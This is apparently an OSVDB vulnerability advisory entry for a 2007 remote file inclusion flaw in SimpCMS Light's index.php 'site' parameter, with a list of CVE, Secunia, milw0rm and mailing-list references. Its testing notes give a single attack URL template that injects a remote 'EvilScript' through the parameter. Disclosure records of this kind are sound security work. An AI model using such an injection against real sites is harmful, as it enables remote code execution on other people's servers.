SimpCMS Light index.php site Variable Remote File Inclusion

2007-04-10T06:34:03
ID OSVDB:34775
Type osvdb
Reporter OSVDB
Modified 2007-04-10T06:34:03

Description

Manual Testing Notes

http://[target]/[path]/index.php?site=[EvilScript]

References:

Secunia Advisory ID:24851 Other Advisory URL: http://milw0rm.com/exploits/3705 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0168.html Mail List Post: http://attrition.org/pipermail/vim/2007-April/001515.html Mail List Post: http://www.attrition.org/pipermail/vim/2007-April/001513.html ISS X-Force ID: 33572 FrSIRT Advisory: ADV-2007-1348 CVE-2007-2009 Bugtraq ID: 23439